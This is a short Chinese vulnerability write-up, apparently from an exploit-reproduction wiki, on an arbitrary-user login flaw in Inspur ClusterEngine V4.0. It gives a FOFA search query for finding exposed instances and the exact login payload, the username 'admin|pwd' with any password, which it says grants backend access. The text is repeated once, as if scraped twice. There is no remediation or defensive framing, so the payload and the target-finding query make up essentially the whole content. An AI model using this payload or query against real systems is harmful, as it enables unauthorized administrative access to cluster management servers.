任意用户登录漏洞
漏洞描述
浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限
漏洞影响
浪潮ClusterEngineV4.0
FOFA
title="TSCEV4.0"
漏洞复现
登录页面下
USER: admin|pwd
PASS: 任意成功登陆后台
Last updated
Was this helpful?
浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限
浪潮ClusterEngineV4.0
title="TSCEV4.0"
登录页面下
USER: admin|pwd
PASS: 任意成功登陆后台
Last updated
Was this helpful?
Was this helpful?